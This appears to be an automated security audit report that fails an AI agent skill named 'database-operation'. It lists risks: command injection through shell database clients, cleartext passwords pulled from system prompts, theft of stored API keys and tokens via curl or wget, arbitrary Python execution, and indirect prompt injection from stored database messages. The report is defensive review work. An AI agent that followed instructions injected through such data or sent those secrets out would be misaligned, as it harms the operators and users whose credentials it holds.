database-operation
Fail
Audited by Gen Agent Trust Hub on Apr 9, 2026
Risk Level: HIGHCOMMAND_EXECUTIONCREDENTIALS_UNSAFEDATA_EXFILTRATIONREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The skill instructs the agent to use the execute_command tool to run shell-based database clients like sqlite3 and psql. This pattern is susceptible to command injection if SQL queries or connection parameters are dynamically constructed from untrusted user input.
- [CREDENTIALS_UNSAFE]: The instructions require the agent to extract cleartext passwords from system prompts and include them directly in shell commands (e.g., PGPASSWORD). This practice exposes sensitive credentials in system process lists and potentially shell history files.
- [DATA_EXFILTRATION]: By granting access to tables such as site (containing cookies, apikey, and tokens) and user, the skill exposes sensitive application secrets. Although safety rules advise against displaying these to the user, the availability of execute_command allows an attacker to exfiltrate this data via network utilities like curl or wget.
- [REMOTE_CODE_EXECUTION]: The troubleshooting section suggests a fallback mechanism using python3 -c to execute arbitrary Python code for database interaction. This provides a direct vector for running unvalidated code on the host system.
- [PROMPT_INJECTION]: The skill processes data from tables like 'message' and 'downloadhistory' which could contain untrusted content. This creates an indirect prompt injection surface where malicious instructions stored in the database could influence the agent's behavior during result interpretation.
Recommendations
- AI detected serious security threats
Audit Metadata